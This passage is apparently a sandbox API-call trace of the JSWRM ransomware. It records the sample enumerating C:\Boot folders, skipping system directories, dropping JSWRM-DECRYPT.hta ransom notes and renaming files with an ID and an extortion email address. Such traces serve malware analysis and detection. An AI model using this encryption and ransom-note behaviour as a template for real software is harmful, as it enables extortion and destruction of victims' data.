hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.008] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.009] CloseHandle (hObject=0x450) returned 1 [0064.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236cc8 | out: hHeap=0x1e0000) returned 1 [0064.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0064.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0064.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237218 [0064.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.010] GetFileAttributesW (lpFileName="C:\\Boot\\lt-LT\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\lt-lt\\jswrm-decrypt.hta")) returned 0x20 [0064.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237218 | out: hHeap=0x1e0000) returned 1 [0064.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.010] FindFirstFileW (in: lpFileName="C:\\Boot\\lt-LT\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cd0ddae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0064.010] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.010] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cd0ddae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.010] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.010] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.010] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.010] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.010] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.011] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.011] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.011] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.011] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.011] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.011] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.011] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.011] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0064.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0064.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.011] CreateFileW (lpFileName="C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.012] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0064.012] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.013] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.013] CloseHandle (hObject=0xffffffff) returned 1 [0064.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0064.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0064.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0064.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0064.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0064.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0064.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0064.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.013] MoveFileW (lpExistingFileName="C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\lt-LT\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0064.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.013] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cd0ddae, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cd0ddae, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cd0ddae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.013] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.013] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.013] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.013] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.013] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.013] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.014] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.014] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.014] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.014] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0064.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0064.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0064.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0064.014] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cd0ddae, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cd0ddae, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cd0ddae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0064.014] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0064.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0064.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.014] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0064.014] lstrcmpiW (lpString1="lv-LV", lpString2=".") returned 1 [0064.014] lstrcmpiW (lpString1="lv-LV", lpString2="..") returned 1 [0064.014] lstrcmpiW (lpString1="lv-LV", lpString2="...") returned 1 [0064.014] lstrcmpiW (lpString1="lv-LV", lpString2="windows") returned -1 [0064.014] lstrcmpiW (lpString1="lv-LV", lpString2="recovery") returned -1 [0064.014] lstrcmpiW (lpString1="lv-LV", lpString2="perflogs") returned -1 [0064.014] lstrcmpiW (lpString1="lv-LV", lpString2="documents and settings") returned 1 [0064.014] lstrcmpiW (lpString1="lv-LV", lpString2="$RECYCLE.BIN") returned 1 [0064.014] lstrcmpiW (lpString1="lv-LV", lpString2="system volume information") returned -1 [0064.015] lstrcmpiW (lpString1="lv-LV", lpString2="msocache") returned -1 [0064.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0064.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0064.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237538 [0064.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.015] GetFileAttributesW (lpFileName="C:\\Boot\\lv-LV\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\lv-lv\\jswrm-decrypt.hta")) returned 0xffffffff [0064.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237538 | out: hHeap=0x1e0000) returned 1 [0064.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2370d8 [0064.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.015] CreateFileW (lpFileName="C:\\Boot\\lv-LV\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\lv-lv\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.015] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.015] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.016] CloseHandle (hObject=0x450) returned 1 [0064.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2370d8 | out: hHeap=0x1e0000) returned 1 [0064.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0064.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0064.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0064.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237588 [0064.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.018] GetFileAttributesW (lpFileName="C:\\Boot\\lv-LV\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\lv-lv\\jswrm-decrypt.hta")) returned 0x20 [0064.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237588 | out: hHeap=0x1e0000) returned 1 [0064.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0064.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.018] FindFirstFileW (in: lpFileName="C:\\Boot\\lv-LV\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cd0ddae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0064.018] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.018] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cd0ddae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.018] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.018] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.018] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.018] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.018] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.018] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.018] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.019] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.019] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.019] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.019] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.019] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.019] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0064.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0064.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, 